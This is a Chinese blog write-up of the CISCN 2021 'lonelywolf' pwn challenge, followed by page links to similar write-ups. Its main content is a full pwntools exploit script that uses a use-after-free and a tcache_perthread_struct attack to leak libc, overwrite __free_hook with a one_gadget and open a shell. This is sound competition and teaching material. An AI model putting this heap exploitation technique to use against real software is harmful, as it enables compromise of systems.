ciscn2021 pwn-lonelywolf

最新推荐文章于 2022-10-02 20:28:46 发布
最新推荐文章于 2022-10-02 20:28:46 发布
阅读量226 收藏
点赞数 1
分类专栏: wp 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/124862183
版权

ciscn2021 pwn-lonelywolf

简单题
保护全开
有一个很明显的uaf漏洞
在这里插入图片描述
在这里插入图片描述
add还限制了大小
攻击思路:利用tcache struct attack来解决这一道题目,申请到tcache struct这里之后有两种方法来得到unsortedbin的块。
第一种是对struct进行绕过并释放,第二种是将申请的堆块伪造成0x91并释放。这里选择第二种。
因为tcache第一个bin满7个接下来就会fastbin或者进入其他的bin。所以我们改里面的0x91对应的counts为7,再利用uaf将下面的堆块size伪造成0x91,这样再free之后会进入unsortedbin,之后tcache dup attack即可。

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

debug = 0
if debug:
    r = remote()
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'Your choice: '

def add(index, size):
    r.sendlineafter(menu, '1')
    r.sendlineafter('Index: ', str(index))
    r.sendlineafter('Size: ', str(size))

def edit(index, content):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Index: ', str(index))
    r.sendlineafter('Content: ', content)

def show(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Index: ', str(index))

def delete(index):
    r.sendlineafter(menu, '4')
    r.sendlineafter('Index: ', str(index))

add(0, 0x78)
delete(0)

edit(0, b'\x00' * 0x10)
delete(0)
show(0)

r.recvuntil('Content: ')
heap_base = u64(r.recv(6).ljust(8, b'\x00')) - 0x260
li('heap_base = ' + hex(heap_base))

edit(0, p64(heap_base + 0x10))
add(0, 0x78)
add(0, 0x78)

p1 = p32(0) + b'\x00\x01\x01\x07' + p64(0) * 12 + p64(heap_base + 0x250) + p64(heap_base + 0x260)
edit(0, p1)

add(0, 0x68)

p2 = p64(0) + p64(0x91) + p64(0)
edit(0, p2)
add(0, 0x30)

p3 = b'\x00' * 8 + p64(0x31)
edit(0, p3)

add(0, 0x78)
delete(0)

show(0)
malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10
li('malloc_hook = ' + hex(malloc_hook))
libc = ELF(file_name).libc
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
one = [0x4f3d5, 0x4f432, 0x10a41c]
one_gadget = one[2] + libc_base

add(0, 0x20)
delete(0)
edit(0, p64(free_hook))

add(0, 0x20)
add(0, 0x20)
edit(0, p64(one_gadget))

add(0, 0x20)
delete(0)

r.interactive()
z1r0.
关注
专栏目录
ciscn_pwn_lonlywolf
Torebtr的博客
05-22 440
ciscn复现 太菜了,比赛的时候啥也不会,还要肝材料,写到两点,网速也差到爆,实在写不下去了,队友去hw了,分区赛也没进,好好复现,争取下次取得好成绩吧。。。。。 文章目录**ciscn复现****pwn**:*ciscn_2021_lonelywolf*函数分析1、allocate**2、edit函数****3、show****4、delete**解题思路:exp: pwnciscn_2021_lonelywolf 函数分析 题目整体来说不难,常规菜单题,然后进行函数分析(函数已重命名)。而且给了l
ciscn2019 pwn3
pondzhang的专栏
05-26 381
from pwn import * p = process("./ciscn_2019_n_3") elf = ELF('./ciscn_2019_n_3') def do_new_text(idx, lens, content): p.sendlineafter("CNote > ", '1') p.sendlineafter("Index > ", str(idx)) p.sendlineafter("Type > ", '2') p.sendlin
ciscn_2021_pwny.zip
05-17
2021年全国大学生信息安全竞赛pwn题。
ciscn_2021_pwn_lonelywolf&silverwolf
weixin_49697396的博客
05-18 879
一、lonelywolf 构造double free泄露并打印堆地址,利用堆地址计算tcache_perthread_struct结构体地址 使用double free 攻击tcache_perthread_struct,修改count>7,并使得下一次申请到tcache_perthread_struct位置,并再次留下tcache_perthread_struct地址 利用tcache_perthread_struct的size free后会放入unsorted bin中,可以泄露出libc地
ciscn2021 pwn-pwny
z1r0的博客
05-16 433
ciscn2021 pwn-pwny 查看保护 程序初始化的时候fd取的是一个随机数 所以在程序运行的时候直接read的时候会出错,因为找的是无效内存。所我们需要将fd变成0就可以正常使用read这个东西了。 在这里有个很明显的漏洞,没有限制index,所以可以oob利用。 攻击思路:fd变成0才可以正常利用,看一下202060有什么地址可以让oob发挥作用。 fd刚好就在202060这里,所以我们直接利用oob将fd给覆盖成0。 fd为0之后可以正常的读地址了,借助read功能读取libc和pi
2021 ciscn 线上 pwn silverwolf
yongbaoii的博客
08-30 855
显然是全绿。 add 只能控制一个chunk,size也有限制。 edit 以回车结束。 这里有一个off by null。 show 就输出。 free 有个uaf。 其实比起lonelywolf来说就是开了个沙箱。 整个看下来,那个index就是那种逗你玩那种。 然后libc当时给的是2.27,但是做半天发现是最新的2.27……里面更新了对那些tcache链表的那些检查,就挺离谱的,所以可以当成2.29来做。 那想想怎么来利用那个uaf。 uaf,在得到libc的条件下,我们可以直接攻击free_h.
2021 ciscn 线上 pwn pwny
yongbaoii的博客
08-23 314
保护拉满。 两个功能,read write read 202860放了一个随机数。 read把随机数当作文件fd。 write 也是一个read函数,fd是刚刚那个随机数。 但是这里的write显然index可以随便写,就会有个越界。 我们可以把fd文件号改成从文件中读出来的这个数,但是我们想让他为0,但是显然不大行,因为你不知道这个数是多少 当我们两次write的改fd,第一次fd改成一个比较大的数,第二次就会导致读取失败,所以v2的值不会变,利用的是这种巧妙的手法,来让fd等于0. 接下来就是利.
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 437
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
2021-鹏城实验室网络安全技能大赛-pwn-babyheap 题解
lifanxin的博客
09-28 2459
Write Up文件信息漏洞定位利用分析WP总结 文件信息   本题来自于2021年的鹏程杯比赛的pwn题,题目链接如下:2021-鹏程杯-pwn-babyheap。   该题目主要考查了libc-2.29.so及以上版本的off-by-null利用方式,本题目使用的是libc-2.31.so,知识点学习推荐博客glibc2.29下的off-by-null。同时作为堆题,保护全开,没有可用的show功能函数,必须使用IO_FILE来leak libc,知识点学习推荐博客pwn题堆利用的一些姿势 – IO_F
ciscn2021CTF国赛pwn
qq_39948058的博客
08-27 1370
CTF2021-05-18 总结:这次pwn的比赛难易程度尚可,菜菜的我在各位师傅的领导下勉勉强强做出了3道pwn,这三道pwn都不算太难,一道越界,越界pwny这道题确实把我搞吐了,后期卡在了ret的与数组的偏移,这个不会计算,在th1un师傅的领导下,才知道了如何计算,勉强做出来了,值得说的是数组越界在2021年比赛中出现的越来越频繁了,是真的频繁了,第二道pwn是一个堆,只不过index受到了限制,既然index受到了限制并不影响我们在同一个index构造多个chunk,所以这个题也是常规操作.
2021 ciscn 线上 pwn lonelywolf
yongbaoii的博客
08-30 241
显然是全开。 add 只能控制一个chunk,size也有限制。 edit 以回车结束。 这里有一个off by null。 show 就输出。 free 有个uaf。 整个看下来,那个index就是那种逗你玩那种。 然后libc当时给的是2.27,但是做半天发现是最新的2.27……里面更新了对那些tcache链表的那些检查,就挺离谱的,所以可以当成2.29来做。 那想想怎么来利用那个uaf。 uaf,在得到libc的条件下,我们可以直接攻击free_hook,来getshell。 但问题就是怎么来得到.
CISCN2021pwn lonelywolf(uaf,控制0x250tcache头)
m0_51251108的博客
10-02 206
复现CISCN2021pwn lonelywolf
【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3
arttnba3的博客
05-21 740
【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3[GITHUB BLOG ADDR](https://arttnba3.cn/2021/05/15/CTF-0X04-CISCN2021-PRELIMINARY/)0x00.绪论0x01.场景实操 开场卷pwny | Donelonelywolf | Donechannel0x02.场景实操 二阶卷silverwolf | Donegame0x03.场景实操 冲刺卷satool GITHUB BLOG A
lonewolf
wuyvle的博客
05-15 1034
原来是一个uaf,真不戳,还有一个show函数,也就是说我们可以泄露main_aren来泄露libc基值,因为2.27我们可以double free,但现在比之前要多了检查,我们要修改一下,如何可以快乐的df了,劫持free_hook,得到flag from pwn import * elf=ELF("./lonelywolf") p=remote=("124.70.38.80",22175) libc = ELF('./libc-2.27.so') context.terminal=["gnome-te.
2021第十四届全国大学生信息安全竞赛WP(CISCN)-- pwn部分
热门推荐
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
ciscn2021初赛pwn部分wp
eeeeeight的博客
05-17 1183
ciscn2021初赛 感谢wepn的队友 Column: May 17, 2021 pwny: 首先ida看一眼发现read文件描述符全是3, 好像是读个随机数, 然后我们在3的地址上连着用Write读两次就可以把他变成0, 就可以写入内存了, 后面就是数组越界写, 负数可以往前面读读出libc偏移和pie偏移, 在得到libc之后可以获得环境变量environ的地址, 之后通过(libc_base+libc.sym[‘environ’]-pie_base-0x202060)/8, 就可以得到其位置是数组
攻防世界pwn-forgot
最新发布
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值